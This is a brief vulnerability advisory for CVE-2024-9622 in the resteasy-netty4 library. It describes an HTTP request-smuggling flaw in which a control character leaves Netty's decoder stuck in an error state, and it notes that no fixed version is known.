CVE-2024-9622

Name of the Vulnerable Software and Affected Versions resteasy-netty4 library (affected versions not specified)

Description A vulnerability was found in the resteasy-netty4 library arising from improper handling of HTTP requests using smuggling techniques. When an HTTP smuggling request with an ASCII control character is sent, it causes the Netty HttpObjectDecoder to transition into a BAD MESSAGE state. As a result, any subsequent legitimate requests on the same connection are ignored, leading to client timeouts. This issue may impact systems using load balancers and expose them to risk. The vulnerability can be exploited by a remote attacker to send hidden HTTP requests, also known as HTTP Request Smuggling attacks.

Recommendations At the moment, there is no information about a newer version that contains a fix for this vulnerability.